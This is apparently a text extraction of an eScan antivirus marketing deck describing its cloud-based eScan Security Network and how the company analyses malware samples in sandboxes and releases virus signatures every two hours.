Transcript
Anti-Virus & Content Security
Cloud Protection Vs Traditional Security
www.escanav.com
Anti-Virus & Content Security
Cloud Protection
Third party Subscribed Services
1
Infected File Info shared on real-time
2
2
Anti-Virus & Content Security
Anti-Virus & Content Security
ESN
Anti-Virus & Content Security
Live Internet
Connection Required
Live Internet
Connection Required
Good Files
Anti-Virus & Content Security
Bad Files
2
Anti-Virus & Content Security
Anti-Virus & Content Security
2
2
1
1
4
4
Signature
Signature
3
3
Creation
Creation
Signature Release every 2 hour
Signature Release every 2 hour
eScan Research Team
1
Infected file Info shared on real-time by third
party services and eScan research team with ESN
2
Information is updated to all the users world wide
through ESN on real – time
4
Signature is released by eScan every 2 hours
2
3
Virus Signature is created
3
We at eScan have developed a technology called eScan Security Network
(ESN). This technology can automatically analyze, classify, detect and
quarantine 99.99% of new malware that are discovered every day, keeping our
clients protected on a real time basis. When it comes to detecting new
malware, ESN ensures a prompt response and an advanced level of detection
that provides superior protection. eScan Security Network is not only capable
of detecting and blocking unknown threats but can also prevent zero-day
threats and phishing attempts.
This cloud-based eScan Security Network ensures protection against current
threats, such as viruses, worms, Trojans and identifies and blocks new threats
before they become widespread
This interaction includes 4 different phases. Information on the newly
Anti-Virus & Content Security
executed or downloaded applications is sent by third party subscription
services and eScan research team to eScan Security Network Servers.
The files are checked and added to the eScan database if they are
found to be malicious either by eScan research team or by third party
services subscribed by eScan. Legitimate files are added to the
“Whitelisting” database.
Information about newly discovered malicious and legitimate files
becomes available to all users of relevant eScan products minutes after
the initial detection.
Local database of application whitelisting is built and updated for
legitimate applications.
eScan with Cloud Security is specially designed security solution that provides
real-time protection to computers from objectionable content and security
threats, such as Viruses, Spyware, Adware, Key loggers, Rootkits, Botnets,
Hackers, Spam, and Phishing.
Dependency on internet has no limits and this is proved by the increasing
number of Internet users that spend quite a chunk of their time online. This
has also led to an array of cyber threats that are persistent, sophisticated and
targeted increasing the risk to your confidential information.
Hence, in such situation detecting them before they cause harm to your
computing activities is very important. eScan is equipped with a combination
of advance technologies that are based on malware detection through
Signature, heuristics, as well as behavioral analysis. With its advanced Web
Protection and Anti-Spam Modules eScan is fully capable of blocking
malicious websites and hacking attempts that can steal banking credentials or
private data from user computer, facilitating safe banking experience for the
user. Virus signature are created and updated to the user every two hours.
Anti-Virus & Content Security
How it Works ? Signature creation and release
Sources From where Samples are Received
Research Team eScan
eScan Users
Samples Received
File
Sandbox Analysis
A) Which Registry Keys
are added / modified
B) Which Hosts and IP
are connected to
C) API Calls and other
methods used to infect
URL
Decrypt and Grab
the resultant Payload
A) Check for CVE / EK which
is being exploited
B) Encryption / Obfuscation
Routines, if any, has been used.
C) Other Files which are
used as Payloads.
* Signatures are Created
Updated to all
eScan Customers
All the resultant payloads
are collected and then normal
file algorithm is used
Resultant Payload – It can be any kind of Malicious Java script which loads Java
Applet or a JAR file
CVE – It is a dictionary of publicly known information security vulnerabilities and
exposures.
EK – Exploit Kit - Do it yourself Malware Kits which are available in underground
forums and are used to deploy / manage malware botnets.
Obfuscation – A type of recursive programming to hide the original source code
within itself.
Sandbox Analysis - Automated method to analyze applications / exe/ binaries /
URLs in a controlled environment
At eScan, experienced team of virus analysts and developers work round the
clock gathering information, evaluating new threats and rapidly responding to
any incidence of virus outbreak in any part of the world. Use of advanced
technologies complemented with skilled and experienced team of analysts
and developers enables us to analyze harmful computer viruses of today's
world and create its signature and release the update instantly to our millions
of users all over the world. With years of experience we have devised a strong
methodical process of capturing virus incidents and responding to combat
Anti-Virus & Content Security
such deadly virus outbreaks of today's world as and when it happens, thus
securing computers of all eScan users. With our fast and robust system for
delivering updates that consists of over ninety thousand update servers
located throughout the world user computer are updated within a very short
span of time from the actual release.
The Process
eScan received samples from various sources that includes Samples received
from eScan users, virus information gathered by our in house dedicated team
of analysts and eScan Security Network (eScan Cloud). The above chart gives
you a detailed overview of the process of receiving, analyzing, creating and
releasing of Virus signatures at eScan. Whenever a Sample is received from
any of the sources it is either in form of a File or a URL, there are different
procedures that are followed to analyze the received samples and then create
a signature for releasing updates to our users.
Whenever a malicious URL is received or captured Its content is in
encrypted format which is then decrypted by our malware analysts, the
Resultant Payload is then grabbed out of it.
It is then checked for the CVE or EK which is being exploited.
At Next Level it is checked for any kind of encryption or obfuscation
routine that may have been used.
Checked for other files that are used as payloads.
All the resultant Payloads are then collected and Then normal file
algorithm (File Analysis) is used for further analysis and creation of
Signature.
Whenever a malicious File is received as a sample or Extracted from a URL it is
then analyzed using Sandboxing and other procedures for creation of
Signature. File is checked on the following criteria using Tools and processes.
Actual file execution is done on a computer.
As a result of the execution Modifications made in system files or
registry are checked.
The File Connects to which IP is checked. It also Checks if other files are
download from that IP checked for the type of connection used for file
Download (FTP or HTTP).
Anti-Virus & Content Security
Binary Analysis of file is done using in- house tools that includes dynamic
or static analysis based on the file. File structure and Code is analyzed. API
being called is checked along with the methods used for calling the API.
This is the manual procedure which is used whenever a sample escapes the
detection. Otherwise, all the URLs and the files are processed using the
signatures which were created previously.
*Signature
*Signature is created on the basis of the entire analysis and Updates are
released to the users every two hours.